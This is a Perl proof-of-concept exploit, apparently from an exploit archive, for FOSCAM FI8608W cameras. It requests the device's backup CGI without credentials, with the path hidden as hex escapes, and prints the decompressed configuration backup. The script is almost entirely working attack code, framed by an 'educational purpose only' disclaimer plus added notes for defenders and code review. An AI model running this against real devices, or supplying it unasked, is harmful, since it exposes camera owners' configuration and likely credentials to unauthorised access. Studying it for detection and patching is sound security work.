## https://sploitus.com/exploit?id=PACKETSTORM:154637
#!/usr/bin/perl -w  
#  
# FOSCAM FI8608W Camera Remote Configuration Disclosure  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
#  
# Disclaimer:  
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages   
# caused by direct or indirect use of the information or functionality provided by these programs.   
# The author or any Internet provider bears NO responsibility for content or misuse of these programs   
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!   
#   
# (Don't do anything without permission)  
#  
#   
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
use WWW::UserAgent::Random;  
use Gzip::Faster;  
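# Proof-of-concept check for the FOSCAM FI8608W configuration-backup exposure.
# It sends a single GET, without credentials, for the camera's backup CGI and,
# when the device answers with a gzip body, prints the decompressed
# configuration to STDOUT.
#
# Notes for defenders:
#   * The request path below is written as hex escapes; decoded it is
#     /web/cgi-bin/hi3510/backup.cgi. A GET for that path that carries no
#     credentials and is answered with a success status is the signal to look
#     for in proxy or device logs.
#   * The User-Agent is randomised per run, so it is not a usable indicator.
#   * A device that answers 401 is enforcing authentication on this path
#     (see the 401 branch below).
#   * Treat the output as sensitive: it is the device's configuration backup
#     (presumably account and network settings -- confirm on your own device).
$| = 1;                                      # unbuffered STDOUT so progress lines appear immediately
binmode(STDOUT, ":utf8");
my $host = shift || 'https://192.168.1.1/';  # base URL of the camera's web interface
print "\033[2J";                             # clear the screen
print "\033[0;0H";                           # jump to 0,0
print "[ FOSCAM FI8608W Camera Remote Configuration Disclosure\n";
print "[ =====================================================\n";
print "[ Xploit by: Todor Donev 2019 <todor.donev\@gmail.com>\n";

# Only http/https URLs are accepted; anything else prints the usage line.
if ($host !~ m/^http/) {
    print "[ e.g. perl $0 https://target:port/\n";
    exit;
}

print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");

# NOTE(review): verify_hostname => 0 turns off TLS hostname verification, so
# the peer that answers is not authenticated. That is common for devices with
# self-signed certificates, but it means the dump below cannot be assumed to
# come from the intended device.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 },
);
$browser->timeout(30);
$browser->agent($user_agent);

my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);

# LWP::UserAgent::request always returns a response object, including for
# transport failures, so the outcome has to be read from the response status
# rather than from the call's truth value or from $!.
my $response = $browser->request($request);

if ($response->code eq '401') {
    print "[ 401 Unauthorized!\n";
    exit;
}

# Any other non-success status (connection failure, 404, 5xx, ...) means no
# backup was returned; stop here instead of feeding an error page to gunzip.
if (!$response->is_success) {
    print "[ Exploit Failed: ", $response->status_line, "\n";
    exit 1;
}

# The Server header is optional; avoid an "uninitialized value" warning.
my $server = $response->header('Server');
print "[ Server: ", (defined $server ? $server : 'unknown'), "\n";

# gunzip croaks on input that is not valid gzip, so trap that and report it.
# NOTE(review): the body is untrusted and is decompressed without a size
# limit; a hostile or misbehaving peer could return a very large stream.
my $gzip = $response->content();
my $config = eval { gunzip($gzip) };
if (!defined $config) {
    print "[ Response is not a gzip archive; no configuration returned\n";
    exit 1;
}

# NOTE(review): the decompressed bytes are printed verbatim. They come from
# the remote device, so terminal control sequences in them would be
# interpreted by the terminal; redirect to a file or filter when in doubt.
print "[\n[ Configuration Dump:\n[\n";
print "[ ", $_, "\n" for split(/\n/, $config);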